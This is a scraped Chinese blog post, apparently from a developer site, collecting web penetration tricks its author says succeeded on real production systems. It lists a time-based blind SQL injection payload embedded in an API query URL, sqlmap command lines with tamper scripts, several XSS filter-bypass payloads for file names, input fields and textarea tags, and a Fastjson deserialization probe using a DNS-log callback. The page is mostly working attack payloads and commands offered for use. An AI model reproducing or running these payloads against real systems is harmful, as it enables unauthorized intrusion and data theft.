当前位置:网站首页>web渗透经验汇总ing
web渗透经验汇总ing
2022-07-24 18:10:00 【haoaaao】
前言
//记录真实系统中成功过的小tips,毕竟靶场和生产环境相差还是很大的,**读万卷书不如行万里路**//
0x00、SQL
一次众测实战sql注入绕过 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现——ZAKER,个性化推荐热门新闻,本地权威媒体资讯
http://app.myzaker.com/news/article.php?pk=6035b5af8e9f09165c74a1ccmysql rlike concat_时间盲注子查询与rlike_丧心病狂刘老湿的博客-CSDN博客sql注入首先尝试单引号;当单引号不报错的时候,尝试宽字节注入%df'(--tamper=unmagicquotes)1、时间盲注子查询(SELECT(SLEEP(5)))jHpaPayload: id=1 AND 4301=BENCHMARK(5000000,MD5(0x67426a42))2、rlike报错当使用正则匹配时,使用REGEXP和NOTREGEXP操作符(或RLIKE和NOTR...https://blog.csdn.net/weixin_29611737/article/details/113910368
一、系统中成功过的那些闭合
️http://ip/api/user/query?atSchoolStatus=¤t_page=1&department=01'and(select*from(select+sleep(5))a+union+select+1)='&email=212&enabledStatus=&idCardNumber=&idCardType=
二、系统中成功过的那些sqlmap语句
//sql现在少的我都要怀疑我自己了
python sqlmap.py -r 1.txt --time-sec 8 --tamper=space2mysqlblank.py --batch --level 3 -p canshusqlmap -r xxx.txt --tamper=space2comment --level 3 --batch0x01、XSS
系统中那些成功过的绕过姿势
1、文件附件
//ps:前端验证
️<img src=x οnerrοr=confirm(1)>.jpg
2、input标签
️”><img src=1 οnerrοr=alert(1)>
3、textarea标签
️unicode编码绕过:
</textarea><img src="x" οnerrοr="alert("xss");">
️
绕过姿势汇总
0x02、反序列化
1、Fastjson
//发送数据包中发现fastjson框架,进行尝试。
步骤:
(1)去https://dig.pm/上申请dns。

(2)payload:{ {"@type":"java.net.URL","val":"http://dns"}:"summer"},替换payload里的dns,点击post发包。
(3)打开dig网站的“results”,有漏洞,results会有回显。
边栏推荐
- [leetcode] 30. Concatenate substrings of all words
- Introduction and use of Pinia
- es(1)
- Model saving and loading of sklearn
- File upload vulnerability -.User.ini and.Htaccess
- Growth of operation and maintenance Xiaobai - week 8 of Architecture
- Still building projects from scratch? This upgraded rapid development scaffold is worth a try!
- undefined reference to H5PTopen
- 字符串常用方法(2)
- mac数据库管理软件Navicat Premium Essentials Mac
猜你喜欢

Laravel notes - RSA encryption of user login password (improve system security)

C language to achieve a static version of the address book

安装JumpServer

C language programming training topics: K characters in left-handed string, little Lele and Euclidean, printing arrow pattern, civil servant interview, poplar matrix

SV casts and constants

Codeforces Round #794 (Div. 2)(A.B.C)

Bib | mol2context vec: context aware deep network model learning molecular representation for drug discovery

PXE efficient batch network installation

JumpServer的使用

干货|值得收藏的三款子域名收集工具
随机推荐
Review and analysis of noodle dishes
What are the pitfalls from single architecture to distributed architecture?
Blackmagic Fusion Studio 18
《STL源码剖析》应该怎样读?
Shardingsphere database read / write separation
JumpServer的使用
Growth of operation and maintenance Xiaobai - week 8 of Architecture
New can also create objects. Why do you need factory mode?
再见收费的Navicat!这款开源的数据库管理工具界面更炫酷!
new也可以创建对象,为什么需要工厂模式?
Definition and storage of adjacency table and adjacency storage of directed graph and undirected graph
获取1688app上原数据 API
pinia 入门及使用
Model saving and loading of sklearn
How to read "STL source code analysis"?
使用Prometheus+Grafana监控MySQL性能指标
Go language interface and type
[OBS] cooperation between video and audio coding and RTMP transmission
【校验】只能输入数字(正负数)
es(1)